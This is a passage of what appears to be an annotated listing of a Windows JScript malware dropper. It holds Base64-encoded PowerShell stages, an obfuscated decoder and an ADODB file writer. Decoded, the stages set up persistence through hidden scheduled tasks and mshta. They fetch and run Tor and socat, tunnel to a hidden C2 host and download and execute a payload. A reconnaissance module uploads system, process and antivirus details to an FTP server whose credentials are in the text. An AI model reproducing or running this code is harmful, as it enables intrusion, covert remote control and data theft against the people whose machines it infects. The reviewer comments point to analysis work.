"Ly9jaG9jb2xhdGV5Lm9yZy83emEuZXhlJywkN3opOwp9CkNhdGNoe30KfQppZiAoJChUcnkgeyBUZXN0LVBhdGggJDd6LnRyaW0oKSB9IENhdGNoIHsgJGZhbHNlIH0pKXsKU3RhcnQtUHJvY2VzcyAiJDd6IiAtQXJndW1lbnRMaXN0ICJ4IC1vYCIkZGVzdGluYXRp"+
"b25gIiAteSBgIiR6aXBmaWxlYCIiIC1XYWl0IC1Ob05ld1dpbmRvdwp9CmVsc2V7CiRzaGVsbCA9IG5ldy1vYmplY3QgLWNvbSBzaGVsbC5hcHBsaWNhdGlvbjsKJHppcCA9ICRzaGVsbC5OYW1lU3BhY2UoJHppcGZpbGUpOwpmb3JlYWNoKCRpdGVtIGluICR6aXAu"+
"aXRlbXMoKSkKewokc2hlbGwuTmFtZXNwYWNlKCRkZXN0aW5hdGlvbikuY29weWhlcmUoJGl0ZW0pOwp9Cn0KfQpmdW5jdGlvbiBCYXNlNjRUb0ZpbGUKewpwYXJhbShbc3RyaW5nXSRmaWxlLCBbc3RyaW5nXSRzdHJpbmcpOwokYnl0ZXM9W1N5c3RlbS5Db252ZXJ0"+
"XTo6RnJvbUJhc2U2NFN0cmluZygkc3RyaW5nKTsKI3NldC1jb250ZW50IC1lbmNvZGluZyBieXRlICRmaWxlIC12YWx1ZSAkYnl0ZXM7CltJTy5GaWxlXTo6V3JpdGVBbGxCeXRlcygkZmlsZSwgJGJ5dGVzKTsKfQpmdW5jdGlvbiBSYW5kb21TdHJpbmd7CiAgICBw"+
"YXJhbShbaW50XSRtaW49NSwgW2ludF0kbWF4PTE1KTsKICAgIHJldHVybiAoLWpvaW4gKCg0OC4uNTcpKyg2NS4uOTApKyg5Ny4uMTIyKSB8IEdldC1SYW5kb20gLUNvdW50IChHZXQtUmFuZG9tIC1taW5pbXVtICRtaW4gLW1heGltdW0gJG1heCkgfCAlIHtbY2hh"+
"cl0kX30pKTsKfQpmdW5jdGlvbiBJbml0U2NoZWR1bGxlcnsKICAgIHRyeXsKICAgICAgICBJbXBvcnQtTW9kdWxlIFNjaGVkdWxlZFRhc2tzIC1FcnJvckFjdGlvbiBTdG9wOwogICAgICAgIHJldHVybiAkU0hfVFlQRV9TQ0hFRFVMRURfVEFTSzsKICAgIH1jYXRj"+
"aHsKICAgICAgICAkRmlsZT0kZW52OlRlbXArJ1wnKyhSYW5kb21TdHJpbmcpKycuemlwJzsKICAgICAgICAkRGVzdD0kZW52OlRlbXArJ1wnKyhSYW5kb21TdHJpbmcpOwogICAgICAgIHdoaWxlICghKGlHZ1JMY3lJSlFCenJBICdodHRwczovL2FwaS5udWdldC5v"+
"cmcvcGFja2FnZXMvdGFza3NjaGVkdWxlci4yLjUuMjMubnVwa2cnICRGaWxlKSkge30KICAgICAgICBpZiAoKFRlc3QtUGF0aCAkRGVzdCkgLWVxIDEpe1JlbW92ZS1JdGVtIC1Gb3JjZSAtUmVjdXJzZSAkRGVzdDt9bWtkaXIgJERlc3QgfCBPdXQtTnVsbDsKICAg"+
"ICAgICBGVlJDbHNnZ01SQVogJEZpbGUgJERlc3Q7CiAgICAgICAgUmVtb3ZlLUl0ZW0gLUZvcmNlICRGaWxlOwogICAgICAgICRUU0Fzc2VtYmx5PSREZXN0KydcbGliXG5ldDIwXE1pY3Jvc29mdC5XaW4zMi5UYXNrU2NoZWR1bGVyLmRsbCc7CiAgICAgICAgJGxv"+
"YWRMaWIgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkRmlsZSgkVFNBc3NlbWJseSk7CiAgICAgICAgcmV0dXJuICRTSF9UWVBFX1RBU0tfU0NIRURVTEVSOwogICAgfQp9CmZ1bmN0aW9uIHhybk9scmoKewpwYXJhbShbc3RyaW5nXSRuYW1lLCBb"+
"c3RyaW5nXSRjbWQsIFtzdHJpbmddJHBhcmFtcz0nJyxbaW50XSRyZXN0YXJ0PTAsW2ludF0kZGVsYXk9MCxbc3RyaW5nXSRkaXI9JycpOwpzd2l0Y2ggKCRzY2hlZHVsZXJUeXBlKSB7CiAgICAkU0hfVFlQRV9TQ0hFRFVMRURfVEFTSyB7CiAgICAgICAgJEFjdGlv"+
"biA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICRjbWQ7CiAgICAgICAgaWYoLU5vdCBbU3RyaW5nXTo6SXNOdWxsT3JFbXB0eSgkcGFyYW1zKSl7CiAgICAgICAgICAgICRBY3Rpb24uQXJndW1lbnRzPSRwYXJhbXM7CiAgICAgICAgfQogICAgICAg"+
"IGlmKC1Ob3QgW1N0cmluZ106OklzTnVsbE9yRW1wdHkoJGRpcikpewogICAgICAgICAgICAkQWN0aW9uLldvcmtpbmdEaXJlY3Rvcnk9JGRpcjsKICAgICAgICB9CiAgICAgICAgJExvZ29uVHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2dlciAtQXRMb2dP"+
"bjsKICAgICAgICB0cnl7CiAgICAgICAgICAgICRMb2dvblRyaWdnZXIuVXNlcklkPSRlbnY6dXNlcm5hbWU7CiAgICAgICAgfWNhdGNoewogICAgICAgICAgICAkTG9nb25UcmlnZ2VyLlVzZXI9JGVudjp1c2VybmFtZTsKICAgICAgICB9CiAgICAgICAgaWYoLU5v"+
"dCAkZGVsYXkgLWVxIDApewogICAgICAgICAgICAkTG9nb25UcmlnZ2VyLkRlbGF5PU5ldy1UaW1lU3BhbiAtU2Vjb25kcyAkZGVsYXk7CiAgICAgICAgfQogICAgICAgIGlmKCRyZXN0YXJ0IC1lcSAxKXsKICAgICAgICAgICAgJFRpbWVUcmlnZ2VyID0gTmV3LVNj"+
"aGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAxMmFtIC1SZXBldGl0aW9uSW50ZXJ2YWwgKFtTeXN0ZW0uVGltZVNwYW5dOjpGcm9tTWludXRlcygxKSkgLVJlcGV0aXRpb25EdXJhdGlvbiAoW1N5c3RlbS5UaW1lU3Bhbl06OkZyb21EYXlzKDM2NSAqIDIwKSk7"+
"CiAgICAgICAgfQogICAgICAgICRTZXR0aW5ncyA9IE5ldy1TY2hlZHVsZWRUYXNrU2V0dGluZ3NTZXQ7CiAgICAgICAgJFNldHRpbmdzLkRpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzID0gJEZhbHNlOwogICAgICAgICRTZXR0aW5ncy5TdG9wSWZHb2luZ09uQmF0"+
"dGVyaWVzID0gJEZhbHNlOwogICAgICAgIGlmKCRyZXN0YXJ0IC1lcSAxKXsKICAgICAgICAgICAgJFRhc2sgPSBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1BY3Rpb24gJEFjdGlvbiAtVHJpZ2dlciAkTG9nb25UcmlnZ2VyLCRUaW1lVHJpZ2dlciAtU2V0dGluZ3Mg"+
"JFNldHRpbmdzIC1UYXNrTmFtZSAkbmFtZSAtRGVzY3JpcHRpb24gKFJhbmRvbVN0cmluZyk7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICRUYXNrID0gUmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtQWN0aW9uICRBY3Rpb24gLVRyaWdnZXIgJExvZ29uVHJpZ2dl"+
"ciAtU2V0dGluZ3MgJFNldHRpbmdzIC1UYXNrTmFtZSAkbmFtZSAtRGVzY3JpcHRpb24gKFJhbmRvbVN0cmluZyk7CiAgICAgICAgfQogICAgICAgIFN0YXJ0LVNjaGVkdWxlZFRhc2sgLUlucHV0T2JqZWN0ICRUYXNrOwogICAgfTsKICAgIERlZmF1bHQgewogICAg"+
"ICAgICR0cz1OZXctT2JqZWN0IE1pY3Jvc29mdC5XaW4zMi5UYXNrU2NoZWR1bGVyLlRhc2tTZXJ2aWNlOwogICAgICAgICR0ZD0kdHMuTmV3VGFzaygpOwogICAgICAgICR0ZC5SZWdpc3RyYXRpb25JbmZvLkRlc2NyaXB0aW9uID0gKFJhbmRvbVN0cmluZyk7CiAg"+
"ICAgICAgJHRkLlNldHRpbmdzLkRpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzID0gJEZhbHNlOwogICAgICAgICR0ZC5TZXR0aW5ncy5TdG9wSWZHb2luZ09uQmF0dGVyaWVzID0gJEZhbHNlOwogICAgICAgICR0ZC5TZXR0aW5ncy5NdWx0aXBsZUluc3RhbmNlcyA9"+
"IFtNaWNyb3NvZnQuV2luMzIuVGFza1NjaGVkdWxlci5UYXNrSW5zdGFuY2VzUG9saWN5XTo6SWdub3JlTmV3OwogICAgICAgICRMb2dvblRyaWdnZXIgPSBOZXctT2JqZWN0IE1pY3Jvc29mdC5XaW4zMi5UYXNrU2NoZWR1bGVyLkxvZ29uVHJpZ2dlcjsKICAgICAg"+
"ICAkTG9nb25UcmlnZ2VyLlN0YXJ0Qm91bmRhcnk9W1N5c3RlbS5EYXRlVGltZV06Ok5vdzsKICAgICAgICAkTG9nb25UcmlnZ2VyLlVzZXJJZD0kZW52OnVzZXJuYW1lOwogICAgICAgICRMb2dvblRyaWdnZXIuRGVsYXk9W1N5c3RlbS5UaW1lU3Bhbl06OkZyb21T"+
"ZWNvbmRzKCRkZWxheSk7CiAgICAgICAgJHRkLlRyaWdnZXJzLkFkZCgkTG9nb25UcmlnZ2VyKTsKICAgICAgICBpZigkcmVzdGFydCAtZXEgMSl7CiAgICAgICAgJFRpbWVUcmlnZ2VyID0gTmV3LU9iamVjdCBNaWNyb3NvZnQuV2luMzIuVGFza1NjaGVkdWxlci5U"+
"aW1lVHJpZ2dlcjsKICAgICAgICAkVGltZVRyaWdnZXIuU3RhcnRCb3VuZGFyeT1bU3lzdGVtLkRhdGVUaW1lXTo6Tm93OwogICAgICAgICRUaW1lVHJpZ2dlci5SZXBldGl0aW9uLkludGVydmFsPVtTeXN0ZW0uVGltZVNwYW5dOjpGcm9tTWludXRlcygxKTsKICAg"+
"ICAgICAkVGltZVRyaWdnZXIuUmVwZXRpdGlvbi5TdG9wQXREdXJhdGlvbkVuZD0kRmFsc2U7CiAgICAgICAgJHRkLlRyaWdnZXJzLkFkZCgkVGltZVRyaWdnZXIpOwogICAgICAgIH0KICAgICAgICAkdHNmPSJNaWNyb3NvZnQuV2luMzIuVGFza1NjaGVkdWxlciI7"+
"CiAgICAgICAgJEV4ZWNBY3Rpb249TmV3LU9iamVjdCAiJHRzZi5FeGVjQWN0aW9uIigkY21kLCRwYXJhbXMsJGRpcik7CiAgICAgICAgJHRkLkFjdGlvbnMuQWRkKCRFeGVjQWN0aW9uKTsKICAgICAgICAkdGFzaz0kdHMuUm9vdEZvbGRlci5SZWdpc3RlclRhc2tE"+
"ZWZpbml0aW9uKCRuYW1lLCAkdGQpOwogICAgICAgICR0YXNrLlJ1bigpOwogICAgfTsKfQp9CmZ1bmN0aW9uIGlHZ1JMY3lJSlFCenJBIHsKICAgIHBhcmFtKFtzdHJpbmddJEFFVExjbml0S25hTnFyLCBbc3RyaW5nXSRhRW50c0JNdHNheUIpOwogICAgJEVycm9y"+
"QWN0aW9uUHJlZmVyZW5jZSA9ICJTdG9wIjsKICAgIFdyaXRlLUhvc3QgKCJEb3dubG9hZCB7MH0gdG8gezF9IiAtZiAoJEFFVExjbml0S25hTnFyLCAkYUVudHNCTXRzYXlCKSk7CiAgICB0cnkgewogICAgICAgIFN0YXJ0LUJpdHNUcmFuc2ZlciAtU291cmNlICRB"+
"RVRMY25pdEtuYU5xciAtRGVzdGluYXRpb24gJGFFbnRzQk10c2F5QjsKICAgIH0KICAgIGNhdGNoIHsKICAgICAgICAjV3JpdGUtRXJyb3IgJF8gLUVycm9yQWN0aW9uIENvbnRpbnVlOwogICAgICAgIHRyeSB7CiAgICAgICAgICAgIChOZXctT2JqZWN0IFN5c3Rl"+
"bS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJEFFVExjbml0S25hTnFyLCRhRW50c0JNdHNheUIpOwogICAgICAgIH0KICAgICAgICBjYXRjaCB7CiAgICAgICAgICAgICNXcml0ZS1FcnJvciAkXyAtRXJyb3JBY3Rpb24gQ29udGludWU7CiAgICAgICAgICAg"+
"IFN0YXJ0LVByb2Nlc3MgImNtZC5leGUiIC1Bcmd1bWVudExpc3QgIi9iIC9jIGJpdHNhZG1pbiAvdHJhbnNmZXIgL2Rvd25sb2FkIC9wcmlvcml0eSBISUdIIGAiJEFFVExjbml0S25hTnFyYCIgYCIkYUVudHNCTXRzYXlCYCIiIC1XYWl0IC1XaW5kb3dTdHlsZSBI"+
"aWRkZW47CiAgICAgICAgfQogICAgfWZpbmFsbHl7CiAgICAgICAgJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSI7CiAgICB9CiAgICBpZiAoICQoVHJ5IHsgVGVzdC1QYXRoICRhRW50c0JNdHNheUIudHJpbSgpIH0gQ2F0Y2ggeyAkZmFsc2UgfSkp"+
"ewogICAgICAgIHJldHVybiAkdHJ1ZTsKICAgIH0KICAgIHJldHVybiAkZmFsc2U7Cn0KZnVuY3Rpb24gSXdvUE1jewokc2NoZWR1bGVyVHlwZSA9IEluaXRTY2hlZHVsbGVyOwokdGY9JGVudjpUZW1wKydcJysoUmFuZG9tU3RyaW5nKSsnLnppcCc7CiREZXN0VFA9"+
"JGVudjpBTExVU0VSU1BST0ZJTEUrJ1wnKyhSYW5kb21TdHJpbmcpOwokVG9yTWlycm9ycz1AKCJodHRwczovL2Rpc3QudG9ycHJvamVjdC5vcmcvIiwKImh0dHBzOi8vdG9ycHJvamVjdC5taXJyb3IubWV0YWxnYW1lci5ldS9kaXN0LyIsCiJodHRwczovL3Rvci55"+
"YnRpLm5ldC9kaXN0LyIpOwpmb3JlYWNoICgkbWlycm9yIGluICRUb3JNaXJyb3JzKSB7CiAgICAkX3VybD0kbWlycm9yKyd0b3Jicm93c2VyLzcuMC4xMS90b3Itd2luMzItMC4zLjEuOS56aXAnOwogICAgaWYoKGlHZ1JMY3lJSlFCenJBICRfdXJsICR0Zikpewog"+
"ICAgICAgIGJyZWFrOwogICAgfQp9CmlmICgoVGVzdC1QYXRoICREZXN0VFApIC1lcSAxKXtSZW1vdmUtSXRlbSAtRm9yY2UgLVJlY3Vyc2UgJERlc3RUUDt9bWtkaXIgJERlc3RUUCB8IE91dC1OdWxsOwpGVlJDbHNnZ01SQVogJHRmICREZXN0VFA7ClJlbW92ZS1J"+
"dGVtIC1Gb3JjZSAkdGY7CiR5a0Y9JERlc3RUUCsnXFRvclwnOwokV3FQZnY9InZic2NyaXB0OmNsb3NlKENyZWF0ZU9iamVjdChgIldTY3JpcHQuU2hlbGxgIikuUnVuKGAidG9yLmV4ZWAiLDAsRmFsc2UpKSI7Cnhybk9scmogKFJhbmRvbVN0cmluZykgJ21zaHRh"+
"LmV4ZScgJFdxUGZ2IDAgMCAkeWtGOwokU0ZpbGU9JGVudjpUZW1wKydcJysoUmFuZG9tU3RyaW5nKSsnLnppcCc7CndoaWxlICghKGlHZ1JMY3lJSlFCenJBICdodHRwczovL2dpdGh1Yi5jb20vU3R1ZGlvRXRyYW5nZS9zb2NhdC13aW5kb3dzL2FyY2hpdmUvMS43"+
"LjIuMS56aXAnICRTRmlsZSkpe30KRlZSQ2xzZ2dNUkFaICRTRmlsZSAkRGVzdFRQOwokc19vbGQ9JERlc3RUUCsnXHNvY2F0LXdpbmRvd3MtMS43LjIuMVwnOwokc19uZXc9KFJhbmRvbVN0cmluZyk7ClJlbW92ZS1JdGVtIC1Gb3JjZSAkU0ZpbGU7ClJlbmFtZS1J"+
"dGVtIC1wYXRoICRzX29sZCAtbmV3TmFtZSAkc19uZXc7CiRkTGtkT2R2cz0kRGVzdFRQKydcJyskc19uZXcrJ1wnOwokczFjbWQ9J3NvY2F0IHRjcDQtTElTVEVOOjU1NTUscmV1c2VhZGRyLGZvcmssa2VlcGFsaXZlLGJpbmQ9MTI3LjAuMC4xIFNPQ0tTNEE6MTI3"+
"LjAuMC4xOiVET01BSU4lOjgwLHNvY2tzcG9ydD05MDUwJzsKJHMyY21kPSdzb2NhdCB0Y3A0LUxJU1RFTjo1NTg4LHJldXNlYWRkcixmb3JrLGtlZXBhbGl2ZSxiaW5kPTEyNy4wLjAuMSBTT0NLUzRBOjEyNy4wLjAuMTolRE9NQUlOJTo1NTg4LHNvY2tzcG9ydD05"+
"MDUwJzsKJFN5QVN4Vj0idmJzY3JpcHQ6Y2xvc2UoQ3JlYXRlT2JqZWN0KGAiV1NjcmlwdC5TaGVsbGAiKS5SdW4oYCIkczFjbWRgIiwwLEZhbHNlKSkiOwokQ2tlSGFFTW9RYj0idmJzY3JpcHQ6Y2xvc2UoQ3JlYXRlT2JqZWN0KGAiV1NjcmlwdC5TaGVsbGAiKS5S"+
"dW4oYCIkczJjbWRgIiwwLEZhbHNlKSkiOwp4cm5PbHJqIChSYW5kb21TdHJpbmcpICdtc2h0YS5leGUnICRTeUFTeFYgMCAwICRkTGtkT2R2czsKeHJuT2xyaiAoUmFuZG9tU3RyaW5nKSAnbXNodGEuZXhlJyAkQ2tlSGFFTW9RYiAwIDAgJGRMa2RPZHZzOwokd1hk"+
"UmJDRnduPSJ2YnNjIisicmlwdDpjbG9zZShDcmVhdGVPYmplY3QoYCJXU2NyaXB0LlNoZWxsYCIpLlJ1bihgInBvd2Vyc2hlbGwuZXhlIGAiYCJgJEY9YCRlbnY6VGVtcCsnXFwiKyhSYW5kb21TdHJpbmcpKyIuZXhlJztybSAtRm9yY2UgYCRGO2AkY2w9KE5ldy1P"+
"YmplY3QgTmV0LldlYkNsaWVudCk7YCRjbC5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly8xMjcuMC4wLjE6NTU1NS8iKyhSYW5kb21TdHJpbmcpKyIuYXNwP3RzJmlwPScrYCRjbC5Eb3dubG9hZGAiK2AiU3RyaW5nKCdodHRwOi8vYXBpLmlwaWZ5Lm9yZy8nKSxgJEYpOyYg"+
"YCRGYCJgImAiLDAsRmFsc2UpKSI7Cnhybk9scmogKFJhbmRvbVN0cmluZykgJ21zaHRhLmV4ZScgJHdYZFJiQ0Z3biAxOwp9Ckl3b1BNYzs=",
    EMAoYeN: "JExvZ2ZpbGUgPSAkZW52OlRlbXArIlxcJChnYyBlbnY6Y29tcHV0ZXJuYW1lKS5sb2ciOwoKRnVuY3Rpb24gTG9nV3JpdGUKewogIFBhcmFtIChbc3RyaW5nXSRsb2dzdHJpbmcpCiAgJGR0PUdldC1EYXRlIC1Gb3JtYXQgImRkLk1NLnl5eXkgSEg6bW06c3MiOwog"+
"ICRtc2c9W3N0cmluZ106OkZvcm1hdCgiW3swfV06Olt7MX1dIiwkZHQsJGxvZ3N0cmluZyk7CiAgV3JpdGUtSG9zdCAkbXNnOwogIEFkZC1jb250ZW50ICRMb2dmaWxlIC12YWx1ZSAkbXNnOwp9CkZ1bmN0aW9uIFVwbG9hZExvZwp7CiAgJGRlc3QgPSAiZnRwOi8v"+
"cmRrdW5kOnJhaW5kYW5jZUBmdHAxLndtLm5ldC91cGQiOwogICR3ZWJjbGllbnQgPSBOZXctT2JqZWN0IC1UeXBlTmFtZSBTeXN0ZW0uTmV0LldlYkNsaWVudDsKICAkd2ViY2xpZW50LlVwbG9hZEZpbGUoIiRkZXN0LyQoZ2MgZW52OmNvbXB1dGVybmFtZSkubG9n"+
"IiwgJExvZ2ZpbGUpOwogIFJlbW92ZS1JdGVtIC1QYXRoICRMb2dmaWxlOwp9CmZ1bmN0aW9uIENoZWNrSW5zdGFsbCgpewogICR3aW5pbmZvID0gKEdldC1XbWlPYmplY3QgV2luMzJfT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IENhcHRpb24sIFNlcnZpY2VQYWNr"+
"TWFqb3JWZXJzaW9uLCBPU0FyY2hpdGVjdHVyZSwgVmVyc2lvbiwgTVVJTGFuZ3VhZ2VzKTsKICAkd2luaW5mby5NVUlMYW5ndWFnZXM9JHdpbmluZm8uTVVJTGFuZ3VhZ2VzIC1qb2luICIsIjsKICBMb2dXcml0ZSgiT1MgaW5mbzogezB9IiAtZiAkd2luaW5mbyAt"+
"am9pbiAiIik7CiAgaWYgKHRlc3QtcGF0aCB2YXJpYWJsZTpwc3ZlcnNpb250YWJsZSkgewogICAgJHZlcnNpb24gPSAkcHN2ZXJzaW9udGFibGUucHN2ZXJzaW9uOwogIH0gZWxzZSB7CiAgICAkdmVyc2lvbiA9IFt2ZXJzaW9uXSIxLjAuMC4wIjsKICB9CiAgTG9n"+
"V3JpdGUoIlBvd2Vyc2hlbGwgdmVyc2lvbjogezB9IiAtZiAkdmVyc2lvbik7CiAgdHJ5IHsKICAgICRwYWM9R2V0LUl0ZW1Qcm9wZXJ0eSAnaGtjdTpcU29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXEludGVybmV0IFNldHRpbmdz"+
"XCd8U2VsZWN0IC1leHBhbmQgQXV0b0NvbmZpZ1VSTCAtRXJyb3JBY3Rpb24gU3RvcDsKICAgIExvZ1dyaXRlKCJQYWMgc2V0dGVkOiAnJHBhYyciKTsKICB9CiAgY2F0Y2ggewogICAgTG9nV3JpdGUoIkVSUk9SOiBQYWMgbm90IHNldHRlZCIpOwogIH0KICAkQ2Vy"+
"dHMgPSBAKEdldC1DaGlsZEl0ZW0gY2VydDpcQ3VycmVudFVzZXJcUk9PVHxXaGVyZS1PYmplY3QgeyRfLlN1YmplY3QgLWxpa2UgIipDT01PRE8gUlNBIEV4dGVuZGVkIFZhbGlkYXRpb24gU2VjdXJlIFNlcnZlciBDQSAyKiIgLW9yICRfLlN1YmplY3QgLWxpa2Ug"+
"IipDT01PRE8gQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkqIn18Rm9yRWFjaC1PYmplY3QgeyJ7MH0gKHsxfSkiIC1mICgkXy5UaHVtYnByaW50LCRfLk5vdEJlZm9yZSl9KTsKICBpZiAoLU5PVCAkQ2VydHMuY291bnQgLWVxIDApewogICAgTG9nV3JpdGUoIkNlcnRz"+
"IGluc3RhbGxlZDogJ3swfSciIC1mICgkQ2VydHMgLWpvaW4gIjsgIikpOwogIH1lbHNlIHsKICAgIExvZ1dyaXRlKCJDZXJ0cyBub3QgZm91bmQiKTsKICB9CiAgdHJ5ewogICAgJHByb2MgPSBHZXQtUHJvY2VzcyB8IFdoZXJlLU9iamVjdCB7JF8uUHJvY2Vzc05h"+
"bWUgLWxpa2UgInRvcioiIC1vciAkXy5Qcm9jZXNzTmFtZSAtbGlrZSAic29jYXQqIn18U2VsZWN0IC1Qcm9wZXJ0eSBAeyBOYW1lPSJPdXQiOyBFeHByZXNzaW9uPXsiSUQ6ezB9YG5OYW1lOnsxfWBuUGF0aDp7Mn1gbi0tLS0tLS0tLS0tLS0iIC1mICRfLklkLCRf"+
"LlByb2Nlc3NOYW1lLCRfLlBhdGh9fXxTZWxlY3QgLWV4cGFuZCBPdXQ7CiAgICBMb2dXcml0ZSgiUHJvY2Nlc3MgbGlzdDpgbnswfSIgLWYgKCRwcm9jIC1qb2luICJgbiIpKTsKICB9CiAgY2F0Y2ggewogICAgTG9nV3JpdGUoIkVSUk9SOiBDYW4ndCBnZXQgcHJv"+
"Y2Nlc3MgbGlzdCIpOwogIH0KICAkRGVzdFRQPSRlbnY6QUxMVVNFUlNQUk9GSUxFOwogIHRyeXsKICAgICRkaXJzPWRpcigkRGVzdFRQKSAtRXJyb3JBY3Rpb24gU3RvcDsKICAgIExvZ1dyaXRlKCJMaXN0IGRpciBbezB9XTogezF9IiAtZiAoJERlc3RUUCwgKCgk"+
"ZGlyc3xTZWxlY3QgLWV4cGFuZCBOYW1lKSAtam9pbiAiOyAiKSkpOwogICAgZm9yZWFjaCgkZGlyIGluICRkaXJzKXsKICAgICAgICB0cnl7CiAgICAgICAgICAgICRzdWJkaXI9ZGlyKCRkaXIuRnVsbE5hbWUpIC1FcnJvckFjdGlvbiBTdG9wOwogICAgICAgICAg"+
"ICBMb2dXcml0ZSgiTGlzdCBkaXIgW3swfV06ezF9IiAtZiAoJGRpci5GdWxsTmFtZSwgKCgkc3ViZGlyfFNlbGVjdCAtZXhwYW5kIE5hbWUpIC1qb2luICI7ICIpKSk7CiAgICAgICAgfQogICAgICAgIGNhdGNoewogICAgICAgICAgICBMb2dXcml0ZSgiRVJST1I6"+
"IENhbid0IGxpc3QgZGlyIHswfSIgLWYgJGRpci5GdWxsTmFtZSk7CiAgICAgICAgfQogICAgfQogIH0KICBjYXRjaCB7CiAgICBMb2dXcml0ZSgiRVJST1I6IENhbid0IGxpc3QgZGlyIHswfSIgLWYgJERlc3RUUCk7CiAgfQoKICAkYXZsaXN0PShHZXQtV21pT2Jq"+
"ZWN0IC1OYW1lc3BhY2UgInJvb3RcU2VjdXJpdHlDZW50ZXIyIiAtUXVlcnkgIlNFTEVDVCAqIEZST00gQW50aVZpcnVzUHJvZHVjdCIgIEBwc2JvdW5kcGFyYW1ldGVyc3xTZWxlY3QgLWV4cGFuZCBEaXNwbGF5TmFtZSk7CiAgaWYgKC1OT1QgJGF2bGlzdC5jb3Vu"+
"dCAtZXEgMCl7CiAgICBMb2dXcml0ZSgiQXYgaW5zdGFsbGVkOiAnezB9JyIgLWYgKCRhdmxpc3QgLWpvaW4gIjsgIikpOwogIH1lbHNlIHsKICAgIExvZ1dyaXRlKCJBdiBub3QgZm91bmQiKTsKICB9Cn0KZnVuY3Rpb24gU3RhcnRXb3JrKCl7CiAgTG9nV3JpdGUg"+
"IlN0YXJ0IExvZyBtb2R1bGUiOwogIENoZWNrSW5zdGFsbDsKICBVcGxvYWRMb2c7Cn0KU3RhcnRXb3JrOwo="
};
// Base64 codec object. encode, _utf8_encode and _utf8_decode are left with readable names; only the
// decoder is renamed (nzJryrgLluyiPwC). Every later stage calls that decoder to recover registry
// paths, command lines and the embedded PowerShell payloads, and several callers split the Base64
// literal with "+" before decoding, so a search for the full encoded string will not match them.
// NOTE(review): as listed, _utf8_encode replaces /rn/ with "n"; this looks like a CRLF->LF
// normalisation whose backslashes were lost in the listing — confirm against the raw sample.
// NOTE(review): _utf8_decode assigns c1, c2 and c3 without var, so they become globals.
var LbXYsoZotGh={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(e){var t="";var n,r,i,s,o,u,a;var f=0;e=LbXYsoZotGh._utf8_encode(e);while(f<e.length){n=e.charCodeAt(f++);r=e.charCodeAt(f++);i=e.charCodeAt(f++);s=n>>2;o=(n&3)<<4|r>>4;u=(r&15)<<2|i>>6;a=i&63;if(isNaN(r)){u=a=64}else if(isNaN(i)){a=64}t=t+this._keyStr.charAt(s)+this._keyStr.charAt(o)+this._keyStr.charAt(u)+this._keyStr.charAt(a)}return t},nzJryrgLluyiPwC:function(e){var t="";var n,r,i;var s,o,u,a;var f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=this._keyStr.indexOf(e.charAt(f++));o=this._keyStr.indexOf(e.charAt(f++));u=this._keyStr.indexOf(e.charAt(f++));a=this._keyStr.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r)}if(a!=64){t=t+String.fromCharCode(i)}}t=LbXYsoZotGh._utf8_decode(t);return t},_utf8_encode:function(e){e=e.replace(/rn/g,"n");var t="";for(var n=0;n<e.length;n++){var r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r)}else if(r>127&&r<2048){t+=String.fromCharCode(r>>6|192);t+=String.fromCharCode(r&63|128)}else{t+=String.fromCharCode(r>>12|224);t+=String.fromCharCode(r>>6&63|128);t+=String.fromCharCode(r&63|128)}}return t},_utf8_decode:function(e){var t="";var n=0;var r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3}}return t}};
// Helper object shared by every stage below:
//   Jer             - write a string to a file through ADODB objects
//   QVn             - random integer in the inclusive range [m, n]
//   PsdPmHMCVqenzuN - random printable string, used for the names of dropped files
//   nahF            - strip leading and trailing whitespace
var SGUUmXppVIOh={
    // Jer(KIp, uIDujligs): write the string uIDujligs to the path KIp, replacing an existing file.
    Jer:function(KIp,uIDujligs){
        var OZK = new ActiveXObject("ADODB.Stream");
        OZK.Open();
        OZK.Type=BINARY_STREAM_TYPE;

        // A one-field in-memory Recordset is used only to turn the string into a byte array:
        // AppendChunk stores the string, GetChunk hands it back as binary data.
        // 204 and 0x80 correspond to adVarBinary and adFldLong in the ADO constants;
        // the field is sized at two bytes per character.
        var LysWjSbnQFw = new ActiveXObject("ADODB.Recordset");
        var yrHlCecaTbDwO=uIDujligs.length*2;
        LysWjSbnQFw.Fields.Append("data",204,yrHlCecaTbDwO,0x80);
        LysWjSbnQFw.Open();
        LysWjSbnQFw.AddNew();
        LysWjSbnQFw.Fields("data").AppendChunk(uIDujligs);
        LysWjSbnQFw.Update();
        LysWjSbnQFw.MoveFirst();
        var binArray = LysWjSbnQFw("data").GetChunk(yrHlCecaTbDwO);
        LysWjSbnQFw.Close();

        // Evaluates to OZK.Write(binArray); the call text is assembled from fragments,
        // presumably so the literal "Write(" does not appear next to the stream object.
        eval("OZK.Wri" + "te(bin"+"Array)");
        OZK.Position=0;

        if(VTU.FileExists(KIp)){
            VTU.DeleteFile(KIp);
        }
        OZK.SaveToFile(KIp);
        OZK.Close();

